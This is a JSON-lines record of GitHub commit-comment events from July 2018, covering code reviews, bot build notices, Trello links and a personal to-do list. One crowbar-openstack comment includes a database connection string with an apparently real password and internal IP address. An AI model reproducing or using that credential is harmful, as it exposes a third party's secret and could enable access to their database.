{"id":"7920444161","type":"CommitCommentEvent","actor":{"login":"dezhaddock"},"repo":{"name":"dezhaddock/ToDoList"},"payload":{"comment":{"id":29600477,"position":null,"line":null,"path":null,"commit_id":"0f530fece91c9093dce63b30c6615ef86ce91eb4","created_at":"2018-07-05T00:38:53Z","updated_at":"2018-07-05T00:38:53Z","author_association":"OWNER","body":"### Dez's Todo List\r\n\r\n- [ ] Hot Tub Chemicals\r\n- [ ] Awning Permit\r\n- [ ] Documents FedEx\r\n- [ ] Electrical Work\r\n- [ ] Hypno Therapy Training\r\n- [ ] Ikea Desks for Binstien\r\n- [ ] Arrange with Abrahim to move stuff from Wall Center to Beinstein Basement\r\n- [ ] Need 4 Ikea Desks in Beinstein Basement\r\n- [ ] Get Engineering fix toilet in FS Chain is broken\r\n- [ ] Get Engineering fix phone - keeps ringing to my bedroom washroom\r\n- [ ] Book Car wash for Maybach\r\n- [ ] Grid lighting payment - forwarded to HY\r\n"}},"created_at":"2018-07-05T00:38:53Z"}
{"id":"7920445314","type":"CommitCommentEvent","actor":{"login":"HarryR"},"repo":{"name":"clearmatics/ion"},"payload":{"comment":{"id":29600478,"position":1,"line":1,"path":"contracts/SafeMath.sol","commit_id":"8fea3115fb8cb9f9fb1050e909c4eb757883e7a7","created_at":"2018-07-05T00:39:42Z","updated_at":"2018-07-05T00:39:42Z","author_association":"CONTRIBUTOR","body":"This code doesn't belong to Clearmatics and cannot be relicensed."}},"created_at":"2018-07-05T00:39:42Z"}
{"id":"7920445788","type":"CommitCommentEvent","actor":{"login":"sunqiangqiang"},"repo":{"name":"sunqiangqiang/demo1"},"payload":{"comment":{"id":29600479,"position":null,"line":null,"path":null,"commit_id":"331df36a28165f19fac885ce3ad32667f0cc82d4","created_at":"2018-07-05T00:40:03Z","updated_at":"2018-07-05T00:40:03Z","author_association":"OWNER","body":"hhh"}},"created_at":"2018-07-05T00:40:03Z"}
{"id":"7920447315","type":"CommitCommentEvent","actor":{"login":"matthewoliver"},"repo":{"name":"rhafer/crowbar-openstack"},"payload":{"comment":{"id":29600482,"position":50,"line":50,"path":"chef/cookbooks/crowbar-openstack/recipes/pg2mariadb_preparation.rb","commit_id":"a798efac834e33e1309fe966d2039b8c6e3016fb","created_at":"2018-07-05T00:41:04Z","updated_at":"2018-07-05T00:41:04Z","author_association":"NONE","body":"for barbican I needed to use the `--dburl` option and connection string:\r\n`barbican-db-manage --dburl mysql+pymysql://barbican:ya1xSiylQEaI@192.168.152.84/barbican upgrade`\r\n\r\nTrove is like the others:\r\n`trove-manage --config-file  %{db_override_conf} db_sync`"}},"created_at":"2018-07-05T00:41:04Z"}
{"id":"7920447862","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":29600483,"position":null,"line":null,"path":null,"commit_id":"71086283691f0247459df827de41de472a4874a2","created_at":"2018-07-05T00:41:23Z","updated_at":"2018-07-05T00:41:23Z","author_association":"MEMBER","body":"This breaks the onscreen keyboard right now - it no longer responds to input from the keyboard when you press the '/' key inside the menu, and pressing on any of the entries with the mouse will make it crash too.\r\n\r\nIssue two - if I load any entry from the history list, I see a 'paused' text in the bottom left corner and the program crashes there too.\r\n\r\nReverting this until these very serious issues are resolved in a subsequent future PR."}},"created_at":"2018-07-05T00:41:23Z"}
{"id":"7920448872","type":"CommitCommentEvent","actor":{"login":"Edvanio"},"repo":{"name":"Edvanio/Projeto-CRAS---BIM"},"payload":{"comment":{"id":29600486,"position":5,"line":30,"path":"Projeto CRAS - BIM/Modelos IFC/IFC_EST_2018-08 (Versão em desenvolvimento).ifc","commit_id":"0179429afe7b577303631185c65df68e14cb8109","created_at":"2018-07-05T00:42:05Z","updated_at":"2018-07-05T00:42:05Z","author_association":"OWNER","body":"Não aprovado"}},"created_at":"2018-07-05T00:42:05Z"}
{"id":"7920450241","type":"CommitCommentEvent","actor":{"login":"jbeich"},"repo":{"name":"MrAlex94/Waterfox"},"payload":{"comment":{"id":29600489,"position":null,"line":null,"path":null,"commit_id":"b7b9ee7ce07ce3082a9609b20f036483690a7a71","created_at":"2018-07-05T00:43:03Z","updated_at":"2018-07-05T00:43:03Z","author_association":"CONTRIBUTOR","body":"Do you plan to create a tag as well?"}},"created_at":"2018-07-05T00:43:03Z"}
{"id":"7920456308","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29600499,"position":null,"line":null,"path":null,"commit_id":"d4c0f41e74fc78047569bcc3b5c521fad9020fcb","created_at":"2018-07-05T00:47:04Z","updated_at":"2018-07-05T00:47:04Z","author_association":"OWNER","body":"@Rocky640 Thank you for your feedback and help--I always appreciate it.\r\n\r\nI was aware of the KingDanger overlap but submitted this anyway.  My hypothesis was that, all other bonuses held equal, it's worse for the enemy to have a non-pawn piece on that square than a pawn (or maybe even worse than an empty square), since the attack carries an imminent threat of substantial material loss.\r\n\r\nI find your DefendedByKing proposal really interesting...the code on which we are commenting is functionally equivalent to\r\n\r\n```c++\r\nb = weak & attackedBy[Them][KING];\r\nif (b & ~pos.pieces(Them, PAWN) & ~attackedBy2[Us])\r\n      score += Overload;\r\n```\r\n\r\nwhich clarifies the main differences in the approach:\r\n* Do we include enemy pawns?\r\n* Do we include our double attacks on the enemy pieces?\r\n* Do we have two different bonuses, based on whether `more_than_one(b)` returns true?\r\n\r\nI'm not sure a priori what combination of answers makes the most sense..."}},"created_at":"2018-07-05T00:47:04Z"}
{"id":"7920460792","type":"CommitCommentEvent","actor":{"login":"ymzk-jp"},"repo":{"name":"ymzk-jp/javascript-100nocks"},"payload":{"comment":{"id":29600507,"position":14,"line":14,"path":"answer/shimomu/1/q18_weather.html","commit_id":"29cfc6cfef429f77dab41d8bcde2302cc8e0234e","created_at":"2018-07-05T00:49:54Z","updated_at":"2018-07-05T00:49:54Z","author_association":"OWNER","body":"IOM: インデント"}},"created_at":"2018-07-05T00:49:54Z"}
{"id":"7920466351","type":"CommitCommentEvent","actor":{"login":"mbaronian"},"repo":{"name":"mbaronian/hello-world"},"payload":{"comment":{"id":29600517,"position":4,"line":4,"path":"README.md","commit_id":"d3d95385307ab6f099be1b203b633ba29beb4c17","created_at":"2018-07-05T00:53:34Z","updated_at":"2018-07-05T00:53:34Z","author_association":"OWNER","body":"Just another repostitory"}},"created_at":"2018-07-05T00:53:34Z"}
{"id":"7920469729","type":"CommitCommentEvent","actor":{"login":"ymzk-jp"},"repo":{"name":"ymzk-jp/javascript-100nocks"},"payload":{"comment":{"id":29600526,"position":14,"line":14,"path":"answer/shimomu/1/q18_weather.html","commit_id":"29cfc6cfef429f77dab41d8bcde2302cc8e0234e","created_at":"2018-07-05T00:55:41Z","updated_at":"2018-07-05T00:55:41Z","author_association":"OWNER","body":"ここでオブジェクトするとはしゃれおつですな"}},"created_at":"2018-07-05T00:55:41Z"}
{"id":"7920476187","type":"CommitCommentEvent","actor":{"login":"computergeek1507"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29600534,"position":null,"line":null,"path":null,"commit_id":"3b48982cc6237584523f8e2e505f4d3d939fbff8","created_at":"2018-07-05T00:59:43Z","updated_at":"2018-07-05T00:59:43Z","author_association":"CONTRIBUTOR","body":"Maybe the low limit should be 0.1 or something similar. I just changed the initialize code to match the values set when the reset roto zoom is selected. "}},"created_at":"2018-07-05T00:59:43Z"}
{"id":"7920477568","type":"CommitCommentEvent","actor":{"login":"mark22013333"},"repo":{"name":"CA103T3/TestPractice"},"payload":{"comment":{"id":29600543,"position":null,"line":null,"path":null,"commit_id":"9dae21b7ab57147031a5857d2fb14c053b5e15ba","created_at":"2018-07-05T01:00:28Z","updated_at":"2018-07-05T01:00:28Z","author_association":"CONTRIBUTOR","body":"+1"}},"created_at":"2018-07-05T01:00:28Z"}
{"id":"7920478243","type":"CommitCommentEvent","actor":{"login":"Allan93aj"},"repo":{"name":"Allan93aj/hello_world"},"payload":{"comment":{"id":29600545,"position":null,"line":null,"path":null,"commit_id":"14eaf738777ac818514a6406de1f85e787100c0f","created_at":"2018-07-05T01:00:48Z","updated_at":"2018-07-05T01:00:48Z","author_association":"OWNER","body":"<!DOCTYPE html>\r\n<html>\r\n<head>\r\n</head>\r\n\r\n\r\n<body>\r\n</body>\r\n<html>"}},"created_at":"2018-07-05T01:00:48Z"}
{"id":"7920478601","type":"CommitCommentEvent","actor":{"login":"andylim99"},"repo":{"name":"paypal/paypal-checkout"},"payload":{"comment":{"id":29600547,"position":1,"line":1,"path":"docs/mark.md","commit_id":"2777172491f6451d09073d045ed1ec5f8248e576","created_at":"2018-07-05T01:00:59Z","updated_at":"2018-07-05T01:00:59Z","author_association":"NONE","body":"Ok"}},"created_at":"2018-07-05T01:00:59Z"}
{"id":"7920479618","type":"CommitCommentEvent","actor":{"login":"homiekd"},"repo":{"name":"CA103T3/TestPractice"},"payload":{"comment":{"id":29600549,"position":null,"line":null,"path":null,"commit_id":"9dae21b7ab57147031a5857d2fb14c053b5e15ba","created_at":"2018-07-05T01:01:31Z","updated_at":"2018-07-05T01:01:31Z","author_association":"CONTRIBUTOR","body":"hi"}},"created_at":"2018-07-05T01:01:31Z"}
{"id":"7920480912","type":"CommitCommentEvent","actor":{"login":"matthewoliver"},"repo":{"name":"rhafer/crowbar-openstack"},"payload":{"comment":{"id":29600552,"position":38,"line":38,"path":"chef/cookbooks/crowbar-openstack/recipes/pg2mariadb_preparation.rb","commit_id":"a798efac834e33e1309fe966d2039b8c6e3016fb","created_at":"2018-07-05T01:02:15Z","updated_at":"2018-07-05T01:02:15Z","author_association":"NONE","body":"Something along the lines of running: `/srv/www/openstack-dashboard/manage.py migrate ...`\r\n\r\nFrom what I can see, the database settings are stored in: `/srv/www/openstack-dashboard/openstack_dashboard/local/local_settings.d/_100_local_settings.py`. So would need to point the manage to some new location. Haven't really played with the migration of horizon yet."}},"created_at":"2018-07-05T01:02:15Z"}
{"id":"7920481299","type":"CommitCommentEvent","actor":{"login":"guruofquality"},"repo":{"name":"myriadrf/LimeSuite"},"payload":{"comment":{"id":29600554,"position":null,"line":null,"path":null,"commit_id":"a4bb6dfce9e6296ba686aa134b7d7292c8d80260","created_at":"2018-07-05T01:02:29Z","updated_at":"2018-07-05T01:02:29Z","author_association":"MEMBER","body":"@IgnasJarusevicius just FYI, the math constants work just fine under MSVC, you just need to define _USE_MATH_DEFINES before you include math.h/cmath or add a add_definitions in the CMakeLists.txt"}},"created_at":"2018-07-05T01:02:29Z"}
{"id":"7920482630","type":"CommitCommentEvent","actor":{"login":"taitetsu"},"repo":{"name":"movabletype/movabletype"},"payload":{"comment":{"id":29600556,"position":8,"line":139,"path":"lib/MT/ArchiveType/ContentTypeAuthor.pm","commit_id":"e614c70df345bf8de809b3fe982fecdaae425484","created_at":"2018-07-05T01:03:15Z","updated_at":"2018-07-05T01:03:15Z","author_association":"MEMBER","body":"りょ。負荷が心配ではあるけれど、インデックステンプレートで\r\n\r\n`<mt:Contents>hoge</mt:Contents>`\r\n\r\nとかした場合に限る、だからね。分かれ、と。"}},"created_at":"2018-07-05T01:03:15Z"}
{"id":"7920486722","type":"CommitCommentEvent","actor":{"login":"linlenny"},"repo":{"name":"linlenny/Coursera-Test"},"payload":{"comment":{"id":29600567,"position":null,"line":null,"path":null,"commit_id":"127bb64068de5751512e70db4c918e57c609e3fb","created_at":"2018-07-05T01:05:43Z","updated_at":"2018-07-05T01:05:43Z","author_association":"OWNER","body":"I'm not sure about this"}},"created_at":"2018-07-05T01:05:43Z"}
{"id":"7920491699","type":"CommitCommentEvent","actor":{"login":"ericmuyser"},"repo":{"name":"hyperbridge/blockhub-web-client"},"payload":{"comment":{"id":29600572,"position":42,"line":42,"path":"src/ui/components/game-plans/list.vue","commit_id":"1724bcb84f819df1736fc8371e3b5c29e1269d28","created_at":"2018-07-05T01:08:39Z","updated_at":"2018-07-05T01:08:39Z","author_association":"MEMBER","body":"Let's switch to SCSS"}},"created_at":"2018-07-05T01:08:39Z"}
{"id":"7920494574","type":"CommitCommentEvent","actor":{"login":"pantheon-upstream"},"repo":{"name":"pantheon-systems/drops-8"},"payload":{"comment":{"id":29600578,"position":null,"line":null,"path":null,"commit_id":"a86edf3abab583805cdbc5611ff317cd4da07090","created_at":"2018-07-05T01:10:18Z","updated_at":"2018-07-05T01:10:18Z","author_association":"NONE","body":"Created multidev environment [ci-drops-8#c8-143](https://dashboard.pantheon.io/sites/689219ca-6583-4af8-ab05-2cebf6ef79a0#c8-143).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://c8-143-ci-drops-8.pantheonsite.io/)"}},"created_at":"2018-07-05T01:10:18Z"}
{"id":"7920497973","type":"CommitCommentEvent","actor":{"login":"stucle"},"repo":{"name":"stucle/Source-Store"},"payload":{"comment":{"id":29600583,"position":null,"line":null,"path":null,"commit_id":"a7d77e365f32f2af3f0a3d995e7a364d488039a0","created_at":"2018-07-05T01:12:13Z","updated_at":"2018-07-05T01:12:13Z","author_association":"OWNER","body":"tempfile"}},"created_at":"2018-07-05T01:12:13Z"}
{"id":"7920498308","type":"CommitCommentEvent","actor":{"login":"Kazeu"},"repo":{"name":"Kazeu/RoboLib"},"payload":{"comment":{"id":29600584,"position":5,"line":5,"path":"ConsoleApp24/Program.cs","commit_id":"27dcd3548b86961dc0180593ca83b2a62a0f7c20","created_at":"2018-07-05T01:12:25Z","updated_at":"2018-07-05T01:12:25Z","author_association":"OWNER","body":"Might revert later, likely to use class System.Collections.Generic"}},"created_at":"2018-07-05T01:12:25Z"}
{"id":"7920498830","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29600586,"position":null,"line":null,"path":null,"commit_id":"2c8712b39b32a52021ff78d7c3d3737ba9919606","created_at":"2018-07-05T01:12:41Z","updated_at":"2018-07-05T01:12:41Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Графика: переделать связи.](https://trello.com/c/35PABeGo/32-%D0%B3%D1%80%D0%B0%D1%84%D0%B8%D0%BA%D0%B0-%D0%BF%D0%B5%D1%80%D0%B5%D0%B4%D0%B5%D0%BB%D0%B0%D1%82%D1%8C-%D1%81%D0%B2%D1%8F%D0%B7%D0%B8)"}},"created_at":"2018-07-05T01:12:41Z"}
{"id":"7920499005","type":"CommitCommentEvent","actor":{"login":"keithsw1111"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29600587,"position":null,"line":null,"path":null,"commit_id":"3b48982cc6237584523f8e2e505f4d3d939fbff8","created_at":"2018-07-05T01:12:48Z","updated_at":"2018-07-05T01:12:48Z","author_association":"COLLABORATOR","body":"Yeah I looked at this again last night and your fixes were actually correct ... except you made them in part to wxSmith generated code ... so the next time someone edited the UI they would have been lost. I corrected this last night. I think we are all good."}},"created_at":"2018-07-05T01:12:48Z"}
{"id":"7920505257","type":"CommitCommentEvent","actor":{"login":"malheiros7j"},"repo":{"name":"malheiros7j/TCC-DataMining"},"payload":{"comment":{"id":29600607,"position":null,"line":null,"path":null,"commit_id":"2de917cab234d3975b86c09920d13e90b2f21500","created_at":"2018-07-05T01:16:17Z","updated_at":"2018-07-05T01:16:17Z","author_association":"OWNER","body":"Projetos Retirados do site das Câmaras Municipais de cada cidade:\r\nCampo Grande: http://www.camara.ms.gov.br/projetos-de-lei  Datação:(1998-2018)\r\nRio de Janeiro: http://www.camara.rj.gov.br/ Datação:(2013-2016)\r\nSão Paulo: http://www.camara.sp.gov.br/atividade-legislativa/projetos-apresentados-desde-1948/ \r\nDatação:(1990-2018)\r\nManaus: http://www.cmm.am.gov.br/tipo-leis-projetos/projeto-lei/ Datação:(2008-2018)"}},"created_at":"2018-07-05T01:16:17Z"}
{"id":"7920506047","type":"CommitCommentEvent","actor":{"login":"yuji"},"repo":{"name":"movabletype/movabletype"},"payload":{"comment":{"id":29600608,"position":8,"line":139,"path":"lib/MT/ArchiveType/ContentTypeAuthor.pm","commit_id":"e614c70df345bf8de809b3fe982fecdaae425484","created_at":"2018-07-05T01:16:44Z","updated_at":"2018-07-05T01:16:44Z","author_association":"MEMBER","body":"あ、ごめん。ふと考えた。limit 書かなかった場合の動作はそれで行くとして、limit=\"none\" もサポートしておくのはどうだろう。\r\n\r\nlimit を指定しない場合は全件出るけど、将来的に動作が変更になる可能性があるよ。だから全件出したいときは limit に none を明示的に指定しておくと良いよ。\r\n\r\nのほうがいいかしら・・・。将来的にコンテンツタイプごとの初期値とか設定できるようにすることを考慮すると、このほうがよさそう。"}},"created_at":"2018-07-05T01:16:44Z"}
{"id":"7920506612","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29600609,"position":null,"line":null,"path":null,"commit_id":"df9edb751994e46ded20043f7ab2906b4f5721c3","created_at":"2018-07-05T01:17:04Z","updated_at":"2018-07-05T01:17:04Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-704](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-704).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-704-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T01:17:04Z"}
{"id":"7920508249","type":"CommitCommentEvent","actor":{"login":"tmeasday"},"repo":{"name":"storybooks/storybook"},"payload":{"comment":{"id":29600611,"position":6,"line":128,"path":"addons/jest/README.md","commit_id":"1e3d925a86ef7f339a7d5c426de741f2fbf96051","created_at":"2018-07-05T01:18:00Z","updated_at":"2018-07-05T01:18:00Z","author_association":"MEMBER","body":"🙇 @Keraito "}},"created_at":"2018-07-05T01:18:00Z"}
{"id":"7920510408","type":"CommitCommentEvent","actor":{"login":"beranemo"},"repo":{"name":"ZionYu/restaurant_forum"},"payload":{"comment":{"id":29600615,"position":4,"line":4,"path":"app/controllers/followships_controller.rb","commit_id":"2d7c3ceb7ee692630fa6867cac34706a9c2f02f6","created_at":"2018-07-05T01:19:08Z","updated_at":"2018-07-05T01:19:08Z","author_association":"NONE","body":"在這裡加入 byebug 來追查"}},"created_at":"2018-07-05T01:19:08Z"}
{"id":"7920514618","type":"CommitCommentEvent","actor":{"login":"linleybao"},"repo":{"name":"upmio/upm"},"payload":{"comment":{"id":29600621,"position":null,"line":null,"path":null,"commit_id":"f927f5ca0675cb32a993ce28654411824318b9fc","created_at":"2018-07-05T01:21:26Z","updated_at":"2018-07-05T01:21:26Z","author_association":"CONTRIBUTOR","body":"注释补充：在用户权限管理中追加全局标志，用于在权限管理中，识别可为所有数据库赋权的权限。"}},"created_at":"2018-07-05T01:21:26Z"}
{"id":"7920515925","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29600622,"position":48,"line":48,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-05T01:22:09Z","updated_at":"2018-07-05T01:22:09Z","author_association":"MEMBER","body":"Njol used it for an expression containing one other expression here:\r\nhttps://github.com/SkriptLang/Skript/blob/b7b9b37fd502e60b4a7053edd51469a0af182b5e/src/main/java/ch/njol/skript/hooks/regions/expressions/ExprBlocksInRegion.java#L46-L49"}},"created_at":"2018-07-05T01:22:09Z"}
{"id":"7920516447","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29600623,"position":null,"line":null,"path":null,"commit_id":"6a8e627cd85dba29ce5032e5498f2b8a06a53db6","created_at":"2018-07-05T01:22:24Z","updated_at":"2018-07-05T01:22:24Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 680](https://travis-ci.org/per1234/arduino-ci-script/builds/400219241) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00680-001-tsv"}},"created_at":"2018-07-05T01:22:24Z"}
{"id":"7920516559","type":"CommitCommentEvent","actor":{"login":"WandersonAlves"},"repo":{"name":"WandersonAlves/code-firefighter"},"payload":{"comment":{"id":29600624,"position":null,"line":null,"path":null,"commit_id":"6c67e40e724cebd81335b24b07bf77361f37b574","created_at":"2018-07-05T01:22:27Z","updated_at":"2018-07-05T01:22:27Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Exception Middleware problem](https://trello.com/c/Qli2W71y/6-exception-middleware-problem)"}},"created_at":"2018-07-05T01:22:27Z"}
{"id":"7920516650","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29600625,"position":null,"line":null,"path":null,"commit_id":"6a8e627cd85dba29ce5032e5498f2b8a06a53db6","created_at":"2018-07-05T01:22:29Z","updated_at":"2018-07-05T01:22:29Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 680](https://travis-ci.org/per1234/arduino-ci-script/builds/400219241) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00680"}},"created_at":"2018-07-05T01:22:29Z"}
{"id":"7920516886","type":"CommitCommentEvent","actor":{"login":"WandersonAlves"},"repo":{"name":"WandersonAlves/code-firefighter"},"payload":{"comment":{"id":29600626,"position":null,"line":null,"path":null,"commit_id":"613feb1cedeea1555633be4df816b6987fba0918","created_at":"2018-07-05T01:22:36Z","updated_at":"2018-07-05T01:22:36Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Use redis container](https://trello.com/c/lgiDsUxk/3-use-redis-container)"}},"created_at":"2018-07-05T01:22:36Z"}
{"id":"7920530064","type":"CommitCommentEvent","actor":{"login":"skitzofrenicdev"},"repo":{"name":"skitzofrenicdev/skitzofrenic-"},"payload":{"comment":{"id":29600643,"position":1,"line":1,"path":"README.md","commit_id":"b8f63e7afb25b8bfb5b1256185f98fa1e23f474a","created_at":"2018-07-05T01:29:55Z","updated_at":"2018-07-05T01:29:55Z","author_association":"OWNER","body":"Pull"}},"created_at":"2018-07-05T01:29:55Z"}
{"id":"7920530872","type":"CommitCommentEvent","actor":{"login":"nitaking"},"repo":{"name":"react-navigation/react-navigation"},"payload":{"comment":{"id":29600648,"position":null,"line":null,"path":null,"commit_id":"bc01a4cd5701fd6f73861c14a578131950061f28","created_at":"2018-07-05T01:30:19Z","updated_at":"2018-07-05T01:30:19Z","author_association":"NONE","body":"I see.It worked. \r\nIt is to use properly according to the purpose! Thank you!"}},"created_at":"2018-07-05T01:30:19Z"}
{"id":"7920534733","type":"CommitCommentEvent","actor":{"login":"mujahid34"},"repo":{"name":"mujahid34/repository"},"payload":{"comment":{"id":29600652,"position":null,"line":null,"path":null,"commit_id":"b8dee633595933c6559b9968698fa1b16154b107","created_at":"2018-07-05T01:32:18Z","updated_at":"2018-07-05T01:32:18Z","author_association":"OWNER","body":"hello"}},"created_at":"2018-07-05T01:32:18Z"}
{"id":"7920536801","type":"CommitCommentEvent","actor":{"login":"peterwkl2017"},"repo":{"name":"beichen2012/LabelMe"},"payload":{"comment":{"id":29600654,"position":null,"line":null,"path":null,"commit_id":"941a83a9871a8f509e4eb7955fdbdf1cdcb54b3a","created_at":"2018-07-05T01:33:25Z","updated_at":"2018-07-05T01:33:25Z","author_association":"NONE","body":"hello， 很感兴趣和感谢你写的这个工具。 试用了一下，发现还功能还没完整。 发现如下，不能对多边形进行移动，复制，粘贴。 另外生成的文件也没有Png 标记文件， 只有 json文件。 "}},"created_at":"2018-07-05T01:33:25Z"}
{"id":"7920538765","type":"CommitCommentEvent","actor":{"login":"xReee"},"repo":{"name":"ChildrenSaveOcean/KidsSaveOceanAppIOS"},"payload":{"comment":{"id":29600656,"position":null,"line":null,"path":null,"commit_id":"3bbf84d59edfa2f60440d6b63d2f41cd4ea39be7","created_at":"2018-07-05T01:34:25Z","updated_at":"2018-07-05T01:34:25Z","author_association":"COLLABORATOR","body":"I've also delete the cells of media screens, now I'm just waiting to merge it with news screen"}},"created_at":"2018-07-05T01:34:25Z"}
{"id":"7920541409","type":"CommitCommentEvent","actor":{"login":"nathhia"},"repo":{"name":"nathhia/achados-e-perdidos-1"},"payload":{"comment":{"id":29600661,"position":4,"line":3,"path":"README.md","commit_id":"b2e8b103832cac074fdb9d2f187a47a5eebc99bd","created_at":"2018-07-05T01:35:46Z","updated_at":"2018-07-05T01:35:46Z","author_association":"OWNER","body":"Equipe:\r\nNathalia Albuquerque\r\nAlexandre Callado\r\nDhavid Douglas\r\nHugo Dias"}},"created_at":"2018-07-05T01:35:46Z"}
{"id":"7920543495","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/oniguruma-feedstock"},"payload":{"comment":{"id":29600663,"position":null,"line":null,"path":null,"commit_id":"3a09e2c0107a64d22395d1a4d27e3c67339678d0","created_at":"2018-07-05T01:36:48Z","updated_at":"2018-07-05T01:36:48Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @kkos were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @kkos were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T01:36:48Z"}
{"id":"7920543893","type":"CommitCommentEvent","actor":{"login":"pantheon-upstream"},"repo":{"name":"pantheon-systems/drops-8"},"payload":{"comment":{"id":29600664,"position":null,"line":null,"path":null,"commit_id":"a86edf3abab583805cdbc5611ff317cd4da07090","created_at":"2018-07-05T01:36:59Z","updated_at":"2018-07-05T01:36:59Z","author_association":"NONE","body":"Created multidev environment [ci-drops-8#c8-144](https://dashboard.pantheon.io/sites/689219ca-6583-4af8-ab05-2cebf6ef79a0#c8-144).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://c8-144-ci-drops-8.pantheonsite.io/)"}},"created_at":"2018-07-05T01:36:59Z"}
{"id":"7920544279","type":"CommitCommentEvent","actor":{"login":"NicolasCunha"},"repo":{"name":"devteam2018/Work"},"payload":{"comment":{"id":29600665,"position":null,"line":null,"path":null,"commit_id":"e290d5d2934e0cce0f94e350f5e6c4636ea8357c","created_at":"2018-07-05T01:37:11Z","updated_at":"2018-07-05T01:37:11Z","author_association":"COLLABORATOR","body":"Erro de digitação: FuncionarioFactory ao invés de FuncionarFactory."}},"created_at":"2018-07-05T01:37:11Z"}
{"id":"7920544516","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29600666,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-05T01:37:17Z","updated_at":"2018-07-05T01:37:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T01:37:17Z"}
{"id":"7920544905","type":"CommitCommentEvent","actor":{"login":"NicolasCunha"},"repo":{"name":"devteam2018/Work"},"payload":{"comment":{"id":29600667,"position":null,"line":null,"path":null,"commit_id":"fcec15bab3ab2b64195778744e69d399192a64a6","created_at":"2018-07-05T01:37:30Z","updated_at":"2018-07-05T01:37:30Z","author_association":"COLLABORATOR","body":"Erro de digitação: FuncionarioFactory ao invés de FuncionarFactory."}},"created_at":"2018-07-05T01:37:30Z"}
{"id":"7920545641","type":"CommitCommentEvent","actor":{"login":"charlie619"},"repo":{"name":"charlie619/CharliesSnackBar"},"payload":{"comment":{"id":29600668,"position":13,"line":258,"path":"CharliesSnackBar/CharliesSnackBar/Controllers/AccountController.cs","commit_id":"cc1f1efa05e4f9b5c25e288dca71ad33d6046296","created_at":"2018-07-05T01:37:55Z","updated_at":"2018-07-05T01:37:55Z","author_association":"OWNER","body":"There should be userAdmin instead of user in Line: 258"}},"created_at":"2018-07-05T01:37:55Z"}
{"id":"7920549720","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29600674,"position":null,"line":null,"path":null,"commit_id":"93aafd896bcea8eea94fccd391f27d84b983cf7b","created_at":"2018-07-05T01:39:59Z","updated_at":"2018-07-05T01:39:59Z","author_association":"COLLABORATOR","body":"👍  Thanks!"}},"created_at":"2018-07-05T01:39:59Z"}
